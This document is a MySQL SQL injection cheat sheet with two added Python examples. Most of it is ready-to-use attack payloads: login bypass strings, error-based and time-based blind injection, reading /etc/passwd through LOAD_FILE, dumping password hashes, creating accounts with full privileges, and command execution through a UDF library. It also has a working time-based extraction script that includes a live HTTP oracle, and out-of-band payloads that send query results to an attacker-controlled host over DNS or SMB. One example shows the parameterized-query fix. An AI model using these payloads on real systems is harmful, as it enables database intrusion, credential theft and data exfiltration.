- Initial Exploitation
- Version: SELECT @@VERSION
- SELECT version()
- Current User: SELECT user()
- SELECT system_user()
- user() and its synonym system_user() return the user@host string the client presented; current_user() returns the account whose privileges were actually applied, which can differ when a wildcard-host account matched.
- Current Database: SELECT database()
- Quick Detection
- Error Based SQLi. For integer inputs:
- (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- For string inputs:
- '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- The attacks above should throw a 'Duplicate entry' error whose message contains the result of the inner expression (here @@VERSION followed by ':'), so they only help when the application reflects database errors. The GROUP BY key collision is probabilistic with an unseeded rand(): if no error appears, resend the request or use a row source with more rows (information_schema.tables is the usual choice).
- Clear SQLi Tests. These tests are good for boolean-based injection and for silent probing: they look like ordinary traffic, and each request below should return the same page as id=4 (or a visibly different one) only if the parameter is evaluated as SQL.
- product.php?id=4
- product.php?id=5-1 (returns product 4 if the database evaluates the arithmetic)
- product.php?id=4 OR 1=1 (always true; typically returns the first row or every row instead of product 4)
- product.php?id=-1 OR 17-7=10 (no product -1 exists, so only the true arithmetic clause selects rows)
- Blind SQL Injection (Time Based)
- Use this when you cannot see any difference in the output. Do not sleep for more than about 30 seconds, because the database API connection timeout can easily be reached.
- SLEEP(25)--
- SLEEP() waits for the specified number of seconds without loading the CPU. BENCHMARK() instead keeps the server busy evaluating an expression; it is the fallback on old servers without SLEEP(), but it burns server CPU and its duration depends on the hardware.
- SELECT BENCHMARK(1000000,MD5('A'));
- Real World Samples. SLEEP() returns 0 after waiting, so "OR SLEEP(25)=0" is always true once the sleep has happened. MySQL only treats "--" as a comment when whitespace follows it, so in a URL send "--+" or "-- " (the samples below assume that).
- ProductID=1 OR SLEEP(25)=0 LIMIT 1--
- ProductID=1) OR SLEEP(25)=0 LIMIT 1--
- ProductID=1' OR SLEEP(25)=0 LIMIT 1--
- ProductID=1') OR SLEEP(25)=0 LIMIT 1--
- ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
- ProductID=SELECT SLEEP(25)--
- Line Comments
- DROP sampletable;--
- DROP sampletable;#
- "--" is a comment in MySQL only when followed by whitespace or end of line; "#" needs no space. In a URL, send "--+" or "-- " so the space survives.
- Username : admin'--
- Username : admin' or '1'='1'--
- SELECT * FROM members WHERE username = 'admin'-- ' AND password = 'password'
- This logs you in as admin, because the rest of the SQL query (including the password check) is ignored. It only works when the password is checked inside the same statement; an application that fetches the row and compares the password hash in code is not bypassed by the comment alone.
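The login bypass above, as an added example that is not part of the cheat sheet: the vulnerable concatenated query beside its parameterized form, run against a constructed in-memory SQLite table standing in for the MySQL members table. SQLite is used only so it runs offline; "--" starts a comment in both engines, MySQL additionally requires whitespace after it, which is why the payload carries a trailing space. The table, its rows and the passwords are made up.

```python
import sqlite3

# Constructed stand-in for the page's `members` table. SQLite is used only so the
# example runs offline; the comment behaviour exercised here matches MySQL, except
# that MySQL only recognises "--" as a comment when whitespace follows it.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 'correct horse battery staple')")
    conn.execute("INSERT INTO members VALUES ('bob', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The pattern the cheat sheet attacks: user input spliced into the SQL text.
    With username = "admin'-- " the statement becomes
      SELECT * FROM members WHERE username = 'admin'-- ' AND password = '...'
    and everything after the comment marker, the password check included, is dropped."""
    sql = (f"SELECT * FROM members WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the values travel separately from the SQL
    text, so the quote and the comment marker stay inside the username value."""
    sql = "SELECT * FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run the page's two payloads against both implementations."""
    conn = make_db()
    comment_payload = "admin'-- "              # trailing space so MySQL sees a comment too
    tautology_payload = "admin' or '1'='1'-- "
    return {
        "legit_login": login_parameterized(conn, "admin", "correct horse battery staple"),
        "vulnerable_comment": login_vulnerable(conn, comment_payload, "wrong"),
        "vulnerable_tautology": login_vulnerable(conn, tautology_payload, "wrong"),
        "parameterized_comment": login_parameterized(conn, comment_payload, "wrong"),
        "parameterized_tautology": login_parameterized(conn, tautology_payload, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:24s} -> {'logged in' if ok else 'rejected'}")
```

Both payloads log in through the concatenated query and are rejected by the parameterized one; the fix is the bound parameter, not escaping the quote, which the comment trick would still defeat in many encodings.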
- Inline Comments
- Comment out the rest of the query by not closing the comment, or use comments to bypass blacklists, replace spaces, obfuscate and fingerprint versions: MySQL executes the body of a comment written as /*!NNNNN ... */ only when the server version is at least NNNNN.
- DROP/*comment*/sampletable
- DR/**/OP/*bypass blacklisting*/sampletable
- Splitting a keyword with an empty comment (DR/**/OP) is not accepted by modern MySQL servers, which tokenize DR and OP separately; the space-replacement form (DROP/**/sampletable) is the reliable one.
- If Statements
- Get a different response based on an IF() statement. This is one of the key points of Blind SQL Injection, and it is also very useful for testing simple things blindly and accurately.
- MySQL IF() function
- IF(condition, true-part, false-part)
- SELECT IF(1=1, 'true', 'false')
- If Statement SQL Injection Attack Samples
- SELECT IF(user()='root@localhost','true','false')
- String without Quotes
- SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
- This returns 'KLM'. CHAR() also takes several values at once, CHAR(75,76,77), and a hex literal such as 0x4B4C4D is treated as the same string in a string context, which is shorter and survives most quote filters.
- Bulk Insert
- Loading a file into a table is done with LOAD DATA INFILE. The statement below does the reverse: it writes a table's content to a file on the database server (INTO DUMPFILE writes a single raw row, INTO OUTFILE writes rows with terminators). Both directions need the FILE privilege, a path the mysqld OS user can access, and a location allowed by secure_file_priv; an output file must not already exist.
- SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --
- Load File
- ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
- SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
- This shows the content of c:\boot.ini (the hex literal is the path without quotes). LOAD_FILE() returns NULL, not an error, when the FILE privilege is missing, the file is unreadable by the mysqld user, it exceeds max_allowed_packet, or secure_file_priv restricts the directory, so a NULL does not prove the file is absent.
- Command Execution
- Possible by loading a UDF (user defined function) library: the shared object must be written into the server's plugin_dir (FILE privilege plus write access for the mysqld user), be compiled for the server's platform and architecture, and then be registered with CREATE FUNCTION. Commands then run as the database server's OS user.
- http://packetstormsecurity.org/libra...s_0.0.3.tar.gz
- Create Users
- CREATE USER username IDENTIFIED BY 'password'; --
- Drop Users
- DROP USER username; --
- Make User DBA
- GRANT ALL PRIVILEGES ON *.* TO username@'%';
- These need the CREATE USER privilege and, for GRANT, the privileges being granted plus GRANT OPTION on the injected account; they also need stacked queries, which most MySQL client APIs (for example PHP's mysql_query) do not allow in a single call.
- List Users
- SELECT * FROM mysql.user WHERE 1 LIMIT 0,30
- SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
- SELECT * FROM mysql.user
- LIMIT offset,count: LIMIT 1,1 returns only the second row. Reading mysql.user requires SELECT on the mysql database, which ordinary application accounts usually lack.
- List Passwords
- SELECT user, password FROM mysql.user
- SELECT user, password FROM mysql.user LIMIT 1,1
- SELECT password FROM mysql.user WHERE user = 'root'
- The password column holds the hash, not the plaintext; from MySQL 5.7 on the column is named authentication_string.
- List Databases
- SELECT schema_name FROM information_schema.schemata;
- SELECT schema_name FROM information_schema.schemata LIMIT 1,1;
- Privileges
- SELECT Super_priv FROM mysql.user WHERE user=SUBSTRING_INDEX(USER(),'@',1) LIMIT 0,1--
- SELECT Super_priv FROM mysql.user WHERE user='root' LIMIT 0,1--
- The user column holds only the name part of the account, so split user() at '@'. LIMIT 0,1 returns the first matching row; LIMIT 1,1 would skip it. If mysql.user is not readable, information_schema.user_privileges lists the current account's global privileges.
- Getting user defined tables
- SELECT table_name FROM information_schema.tables WHERE table_schema = 'dbname'
- dbname -> database name (as returned by database()); table_schema is the schema, not a table name
- Getting Column Names
- SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tblUsers'
- tblUsers -> table name
- SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
- Finds the tables which have a column called 'username'.
- Default Databases
- information_schema (>= MySQL 5.0)
- mysql
- Newer servers also ship performance_schema (>= MySQL 5.5) and sys (>= MySQL 5.7); exclude them when enumerating application databases.
- Path of DB files
- SELECT @@datadir
- e.g. C:\AppServ\MySQL\data\ (each database is a subdirectory under it; @@plugin_dir gives the directory a UDF library must be written to)
- Time Based SQLi Exploitation
- ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
- {INJECTION} = the query whose result you want to read (a subquery returning one string); MID(...,1,1) picks its first character.
- If the condition is true, the response arrives after 14 seconds. If it is false, IF() returns 1 immediately, 1 = 0 is false and there is no delay at all. Comparing with > instead of = and binary-searching the value reads each character in about 8 requests instead of up to 255.
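The extraction loop the template above implies, as an added example that is not part of the cheat sheet. It generalizes the page's "= 100" probe to a ">" comparison and binary-searches each character. The HTTP oracle assumes a hypothetical GET endpoint and parameter; the simulated oracle is a constructed stand-in that evaluates the injected condition the way MySQL would (minus the sleep) so the loop runs offline against a made-up version string.

```python
import re
import time
import urllib.parse
import urllib.request
from typing import Callable

# An oracle takes a payload string and returns True when the server delayed, i.e. the
# injected condition was true. Two factories below build one: a real HTTP one (assumed
# endpoint) and a constructed offline one.
Oracle = Callable[[str], bool]

# The page's template, generalised from "= 100" (one value per request) to ">" so the
# ASCII value of each character can be binary-searched in eight requests.
# {query} is a subquery returning one string, {pos} the 1-based character position.
TEMPLATE = ("-99 OR IF((ASCII(MID(({query}),{pos},1)) > {guess}),"
            "SLEEP({delay}),1) = 0 LIMIT 1-- ")


def build_payload(query: str, pos: int, guess: int, delay: int = 5) -> str:
    return TEMPLATE.format(query=query, pos=pos, guess=guess, delay=delay)


def extract_char(oracle: Oracle, query: str, pos: int, delay: int = 5) -> int:
    """Binary-search the ASCII value (0-255) of character `pos` of the query result.
    Each probe asks "is the value greater than mid?"; a delayed response means yes."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_payload(query, pos, mid, delay)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle: Oracle, query: str, delay: int = 5, max_len: int = 64) -> str:
    """Read the result character by character. MID() past the end returns '' and
    ASCII('') is 0 (ASCII(NULL) is NULL, which never sleeps either), so 0 ends the loop."""
    chars = []
    for pos in range(1, max_len + 1):
        value = extract_char(oracle, query, pos, delay)
        if value == 0:
            break
        chars.append(chr(value))
    return "".join(chars)


def http_oracle(url: str, param: str, delay: int = 5) -> Oracle:
    """Oracle for a real GET endpoint (hypothetical url/param): sends the payload in
    `param` and reports whether the response took at least `delay` seconds. urlencode
    turns the trailing space of "-- " into "+", which the server decodes back."""
    def probe(payload: str) -> bool:
        qs = urllib.parse.urlencode({param: payload})
        start = time.monotonic()
        with urllib.request.urlopen(f"{url}?{qs}", timeout=delay * 4) as resp:
            resp.read()
        return time.monotonic() - start >= delay
    return probe


def simulated_oracle(secret: str) -> Oracle:
    """Constructed stand-in for the database: evaluates the injected condition against
    `secret` the way MySQL would, without sleeping, so the extractor runs offline."""
    cond = re.compile(r"MID\(\(.*?\),(\d+),1\)\) > (\d+)\)")

    def probe(payload: str) -> bool:
        m = cond.search(payload)
        pos, guess = int(m.group(1)), int(m.group(2))
        value = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return value > guess      # True: SLEEP() would have fired
    return probe


if __name__ == "__main__":
    # Offline run against a constructed version string.
    print(extract_string(simulated_oracle("5.7.33-log"), "SELECT version()"))
    # Against a real target (hypothetical URL and parameter), 5 second delay:
    # print(extract_string(http_oracle("http://target/product.php", "id"), "SELECT version()"))
```

In practice pick a delay several times larger than the target's normal response jitter, and re-probe any measurement that lands near the threshold, because a single slow but untriggered response flips a bit and corrupts every later character of the search.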
- Out of Band Channel
- ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}),'.yourhost.com\\'))) Makes the database server resolve <data>.yourhost.com (NBNS/DNS) when it tries to open the UNC path, so the data shows up in your DNS logs. This only works on Windows servers, needs the FILE privilege, and the data must form a valid DNS label (letters, digits, hyphens, limited length), so hex-encode it first. The dot before yourhost.com is required or the lookup goes to a different domain.
- ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\SHARE\\output.txt') Writes the data to your SMB share (Windows server, FILE privilege, and secure_file_priv must not restrict the path).
- {INJECTION} = the query whose result you want to exfiltrate.